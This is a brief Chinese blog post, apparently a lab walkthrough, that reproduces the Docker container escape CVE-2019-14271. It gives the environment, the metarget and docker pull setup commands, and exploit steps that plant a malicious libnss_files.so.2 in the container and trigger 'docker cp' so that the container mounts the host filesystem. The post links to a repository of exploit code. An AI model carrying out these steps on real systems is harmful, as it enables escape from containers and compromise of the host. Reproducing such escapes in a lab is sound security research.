NOTE
- For all exploit source code and more detailed information, see https://github.com/iridium-soda/container-escape-exploits .
漏洞原理
环境要求
- Ubuntu 18.04
- Docker 23.01
环境准备
1 | ./metarget cnv install cve-2019-14271 |
拉取镜像
1 | sudo docker pull iridium191/cve-2019-14271 |
Exploit
在容器内
1 | mv /libnss_files.so.2 /lib/x86_64-linux-gnu/ |
在容器外
1 | sudo docker cp 14271:/logs ./ |
容器内的log即挂载了host的文件系统
许可协议
本文采用 署名-非商业性使用-相同方式共享 4.0 国际 许可协议,转载请注明出处。
分享文章
